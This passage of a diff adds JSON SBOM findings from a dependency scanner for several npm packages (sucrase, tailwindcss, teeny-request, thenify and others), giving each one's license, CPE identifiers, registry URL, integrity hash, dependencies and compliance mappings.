"raw": { + "id": "302884898f3a35c4", + "name": "sucrase", + "version": "3.35.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/sucrase@3.35.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz", + "integrity": "sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==", + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.2", + "commander": "^4.0.0", + "lines-and-columns": "^1.1.6", + "mz": "^2.7.0", + "pirates": "^4.0.1", + "tinyglobby": "^0.2.11", + "ts-interface-checker": "^0.1.9" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "57ae1f3ed312e075", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: supports-preserve-symlinks-flag 1.0.0", + "title": "supports-preserve-symlinks-flag 1.0.0", + "description": "Package discovered: supports-preserve-symlinks-flag 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cb6982ee071dbb85", + "name": "supports-preserve-symlinks-flag", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7b659eb857ace717", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: svg-arc-to-cubic-bezier 3.2.0", + "title": "svg-arc-to-cubic-bezier 3.2.0", + "description": "Package discovered: svg-arc-to-cubic-bezier 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "03465a3bffd322b9", + "name": "svg-arc-to-cubic-bezier", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/svg-arc-to-cubic-bezier@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz", + "integrity": "sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0702fc96b298768b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tailwindcss 3.4.19", + "title": "tailwindcss 3.4.19", + "description": "Package discovered: tailwindcss 3.4.19", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4180007fa4dbcaa3", + "name": "tailwindcss", + "version": "3.4.19", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tailwindcss@3.4.19", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz", + "integrity": "sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==", + "dependencies": { + "@alloc/quick-lru": "^5.2.0", + "arg": "^5.0.2", + "chokidar": "^3.6.0", + "didyoumean": "^1.2.2", + "dlv": "^1.1.3", + "fast-glob": "^3.3.2", + "glob-parent": "^6.0.2", + "is-glob": "^4.0.3", + "jiti": "^1.21.7", + "lilconfig": "^3.1.3", + "micromatch": "^4.0.8", + "normalize-path": "^3.0.0", + "object-hash": "^3.0.0", + "picocolors": "^1.1.1", + "postcss": "^8.4.47", + "postcss-import": "^15.1.0", + "postcss-js": "^4.0.1", + "postcss-load-config": "^4.0.2 || ^5.0 || ^6.0", + "postcss-nested": "^6.2.0", + "postcss-selector-parser": "^6.1.2", + "resolve": "^1.22.8", + "sucrase": "^3.35.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1167979aa3e3af06", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: teeny-request 9.0.0", + "title": "teeny-request 9.0.0", + "description": "Package discovered: teeny-request 9.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5100f72eed8a2178", + "name": "teeny-request", + "version": "9.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/teeny-request@9.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b4e9549620686503", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: thenify 3.3.1", + "title": "thenify 3.3.1", + "description": "Package discovered: thenify 3.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9fd87e687c3b74ca", + "name": "thenify", + "version": "3.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/thenify@3.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz", + "integrity": "sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==", + "dependencies": { + "any-promise": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a439c679c65c98cd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: thenify-all 1.6.0", + "title": "thenify-all 1.6.0", + "description": "Package discovered: thenify-all 1.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "845b1699e3aa7533", + "name": "thenify-all", + "version": "1.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/thenify-all@1.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz", + "integrity": "sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==", + "dependencies": { + "thenify": ">= 3.1.0 < 4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e5c0090ac7c6baa4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: thirty-two 1.0.2", + "title": "thirty-two 1.0.2", + "description": "Package discovered: thirty-two 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f3444a348db654fb", + "name": "thirty-two", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:*", + 